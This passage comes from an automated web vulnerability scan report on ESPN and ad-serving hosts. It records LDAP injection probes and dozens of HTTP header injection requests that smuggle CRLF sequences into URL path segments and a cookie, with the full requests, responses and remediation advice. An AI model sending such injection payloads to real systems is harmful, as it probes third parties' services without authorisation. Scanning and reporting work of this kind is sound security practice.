s_pers=%20s_c24%3D1289009690492%7C1383617690492%3B%20s_c24_s%3DFirst%2520Visit%7C1289011490492%3B%20s_gpv_pn%3Dfantasy%253Apoker%253Apokerpickem%253Afrontpage%7C1289011490524%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response 2
HTTP/1.1 404 Not Found Date: Sat, 06 Nov 2010 14:05:29 GMT Server: Omniture DC/2.0.0 xserver: www187 Content-Length: 0 Content-Type: text/html Connection: close
The REST URL parameter 3 appears to be vulnerable to LDAP injection attacks.
The payloads *)(sn=* and *)!(sn=* were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.
Issue background
LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.
Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Issue remediation
If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.
Request 1
GET /adj/SNET_homepage/*)(sn=* HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;
Response 1
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 343 Cache-Control: no-cache Pragma: no-cache Date: Sat, 06 Nov 2010 14:33:39 GMT Expires: Sat, 06 Nov 2010 14:33:39 GMT Connection: close
document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a4a/0/0/%2a/y;212839894;4-0;0;34177316;1-468/60;38365271/38383028/1;;~sscs=%3fhttp://www.espn.co.uk/games/sport/games/roundtheworld.html"><img src="http://s0.2mdn.net/viewad/2232418/308065/468x60_basketball.jpg" border=0 alt="Click here to find out more!"></a>');
Request 2
GET /adj/SNET_homepage/*)!(sn=* HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;
Response 2
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 332 Cache-Control: no-cache Pragma: no-cache Date: Sat, 06 Nov 2010 14:33:39 GMT Expires: Sat, 06 Nov 2010 14:33:39 GMT Connection: close
document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a4a/0/0/%2a/w;212839894;1-0;0;34177316;1-468/60;38365276/38383033/1;;~sscs=%3fhttp://www.espn.co.uk/games/sport/games/jigsaw.html"><img src="http://s0.2mdn.net/viewad/2232418/308065/468x60_jigsaw.jpg" border=0 alt="Click here to find out more!"></a>');
4. HTTP header injectionpreviousnext There are 35 instances of this issue:
HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
The value of REST URL parameter 1 is copied into the Location response header. The payload 5dad5%0d%0a1baec289168 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /5dad5%0d%0a1baec289168/N2465.SD153321N2465SN0/B4809700.16 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/5dad5 1baec289168/N2465.SD153321N2465SN0/B4809700.16: Date: Sat, 06 Nov 2010 14:31:08 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 25cca%0d%0a302ed7e955c was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /25cca%0d%0a302ed7e955c/N3220.ESPN/B4924969.12 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/25cca 302ed7e955c/N3220.ESPN/B4924969.12: Date: Sat, 06 Nov 2010 14:31:45 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 944e8%0d%0a8629d5503b3 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /944e8%0d%0a8629d5503b3/N3220.ESPN/B4924969.13 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/944e8 8629d5503b3/N3220.ESPN/B4924969.13: Date: Sat, 06 Nov 2010 14:32:06 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 2f04e%0d%0a991dea50141 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /2f04e%0d%0a991dea50141/N3220.ESPN/B4924969.15 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/2f04e 991dea50141/N3220.ESPN/B4924969.15: Date: Sat, 06 Nov 2010 14:32:07 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 6940d%0d%0a0d42691d025 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /6940d%0d%0a0d42691d025/N3220.ESPN/B4924969.16 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/6940d 0d42691d025/N3220.ESPN/B4924969.16: Date: Sat, 06 Nov 2010 14:32:11 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 7b10d%0d%0aa22459ac167 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /7b10d%0d%0aa22459ac167/N3220.ESPN/B4924969.17 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/7b10d a22459ac167/N3220.ESPN/B4924969.17: Date: Sat, 06 Nov 2010 14:32:15 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 787e0%0d%0a02a6684dba4 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /787e0%0d%0a02a6684dba4/N3220.ESPN/B4924969.61 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/787e0 02a6684dba4/N3220.ESPN/B4924969.61: Date: Sat, 06 Nov 2010 14:32:16 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 31515%0d%0a8ed6132a227 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /31515%0d%0a8ed6132a227/N3220.ESPN/B4924969.62 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/31515 8ed6132a227/N3220.ESPN/B4924969.62: Date: Sat, 06 Nov 2010 14:32:29 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 5b28f%0d%0a6491db27e37 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /5b28f%0d%0a6491db27e37/N3220.ESPN/B4924969.63 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/5b28f 6491db27e37/N3220.ESPN/B4924969.63: Date: Sat, 06 Nov 2010 14:32:32 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 3fe38%0d%0abb158bf3b84 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /3fe38%0d%0abb158bf3b84/N3340.espn.com/B4282150.59 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=cb86c212e00001a||t=1288931628|et=730|cs=liqctv_d;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/3fe38 bb158bf3b84/N3340.espn.com/B4282150.59: Date: Sat, 06 Nov 2010 22:53:22 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 97c1a%0d%0a2c6a623140a was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /97c1a%0d%0a2c6a623140a/N5364.vibrantmedia.com/B4832252.3 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/97c1a 2c6a623140a/N5364.vibrantmedia.com/B4832252.3: Date: Sun, 07 Nov 2010 01:11:17 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 4cf53%0d%0a74d41d2d621 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /4cf53%0d%0a74d41d2d621/N5865.149077.ESPN/B4748231.11 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/4cf53 74d41d2d621/N5865.149077.ESPN/B4748231.11: Date: Sat, 06 Nov 2010 14:32:37 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 1075c%0d%0a9979249b2bf was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /1075c%0d%0a9979249b2bf/x1.cont/espn/360/soccer HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/1075c 9979249b2bf/x1.cont/espn/360/soccer: Date: Sat, 06 Nov 2010 14:32:47 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 62102%0d%0a9426b771d28 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /62102%0d%0a9426b771d28/N2724.ESPNBass/B4661944.101 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/62102 9426b771d28/N2724.ESPNBass/B4661944.101: Date: Sat, 06 Nov 2010 14:32:57 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 85850%0d%0ab7d666d43dc was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /85850%0d%0ab7d666d43dc/N3175.153731.YAHOOINC.NETWORK-PR/B4640114 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/85850 b7d666d43dc/N3175.153731.YAHOOINC.NETWORK-PR/B4640114: Date: Sun, 07 Nov 2010 01:11:19 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 65135%0d%0a6b830c274ea was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /65135%0d%0a6b830c274ea/N3220.ESPN/B4924969.15 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/65135 6b830c274ea/N3220.ESPN/B4924969.15: Date: Sat, 06 Nov 2010 14:32:59 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 7c00e%0d%0a97c2f2680ae was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /7c00e%0d%0a97c2f2680ae/N3740.132309.BURSTMEDIA/B4366794.6 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/7c00e 97c2f2680ae/N3740.132309.BURSTMEDIA/B4366794.6: Date: Sun, 07 Nov 2010 01:11:19 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 5b47c%0d%0a3682d44bafc was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /5b47c%0d%0a3682d44bafc/N4492.espn.com/B4156424 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/5b47c 3682d44bafc/N4492.espn.com/B4156424: Date: Sat, 06 Nov 2010 14:32:58 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 5ddf2%0d%0a4e2fc26ae1d was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /5ddf2%0d%0a4e2fc26ae1d/N6357.2489.ESPN.COM/B4629693.10 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/5ddf2 4e2fc26ae1d/N6357.2489.ESPN.COM/B4629693.10: Date: Sat, 06 Nov 2010 14:33:05 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 87709%0d%0a5cc45810845 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /87709%0d%0a5cc45810845/N3220.ESPN/B4924969.11 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/87709 5cc45810845/N3220.ESPN/B4924969.11: Date: Sat, 06 Nov 2010 14:33:24 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 232ab%0d%0a4ec2aaa41d5 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /232ab%0d%0a4ec2aaa41d5/N3340.espn.com/B4282150.59 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=cb86c212e00001a||t=1288931628|et=730|cs=liqctv_d;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/232ab 4ec2aaa41d5/N3340.espn.com/B4282150.59: Date: Sat, 06 Nov 2010 22:53:22 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 665ec%0d%0a0ac58374054 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /665ec%0d%0a0ac58374054/N3740.132309.BURSTMEDIA/B4366794.6 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/665ec 0ac58374054/N3740.132309.BURSTMEDIA/B4366794.6: Date: Sun, 07 Nov 2010 01:11:21 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 89fec%0d%0a9060095bbb7 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /89fec%0d%0a9060095bbb7/N6357.2489.ESPN.COM/B4629693.10 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/89fec 9060095bbb7/N6357.2489.ESPN.COM/B4629693.10: Date: Sat, 06 Nov 2010 14:33:27 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 5e317%0d%0a64a4f1f5193 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /5e317%0d%0a64a4f1f5193/x1.cont/espn/360/soccer HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/5e317 64a4f1f5193/x1.cont/espn/360/soccer: Date: Sat, 06 Nov 2010 14:33:35 GMT Server: GFE/2.0 Connection: close
The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload 65a62%0d%0a852639705e9 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.
Request
GET /BurstingPipe/BannerSource.asp HTTP/1.1 Host: bs.serving-sys.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: U=f035c81a-6288-41b1-bdc2-bfc1ef3a57163F7010; A2=dOCf9Kih035P0000820wrG; eyeblaster=BWVal=&BWDate=&debuglevel=65a62%0d%0a852639705e9; B2=6Niz0820wrG; u2=f035c81a-6288-41b1-bdc2-bfc1ef3a57163F7010; E2=035P820wrG; C3=0s9X820wrG0000002_; u3=1; D3=0s9X002H820wrG; C_8557=3615119;
The value of REST URL parameter 2 is copied into the Location response header. The payload f3394%0d%0a260e20407d2 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /pokerpickem/f3394%0d%0a260e20407d2/frontpage HTTP/1.1 Host: games.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A11%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Ftravel%2Fstadium%2FstadiumIndex%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A13%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009690554; s_sess=%20s_ppv%3D99%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289009651247; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009690492%7C1383617690492%3B%20s_c24_s%3DFirst%2520Visit%7C1289011490492%3B%20s_gpv_pn%3Dfantasy%253Apoker%253Apokerpickem%253Afrontpage%7C1289011490524%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 302 Moved Temporarily Connection: close Content-Length: 201 Content-Type: text/html; charset=iso-8859-1 Location: /pokerpickem/en/f3394 260e20407d2/frontpage Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="/pokerpickem/en/f3394 260e20407d2/frontpage">/pokerpickem/en/f3394 260e20407d2/frontpage</A>.<BODY></HTML ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload 4ec69%0d%0a484c4d23469 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /pokerpickem/4ec69%0d%0a484c4d23469/group HTTP/1.1 Host: games.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A11%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Ftravel%2Fstadium%2FstadiumIndex%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A13%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009690554; s_sess=%20s_ppv%3D99%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289009651247; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009690492%7C1383617690492%3B%20s_c24_s%3DFirst%2520Visit%7C1289011490492%3B%20s_gpv_pn%3Dfantasy%253Apoker%253Apokerpickem%253Afrontpage%7C1289011490524%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 302 Moved Temporarily Connection: close Content-Length: 193 Content-Type: text/html; charset=iso-8859-1 Location: /pokerpickem/en/4ec69 484c4d23469/group Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="/pokerpickem/en/4ec69 484c4d23469/group">/pokerpickem/en/4ec69 484c4d23469/group</A>.<BODY></HTML>
The value of REST URL parameter 2 is copied into the Location response header. The payload a807e%0d%0a898e11a593d was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
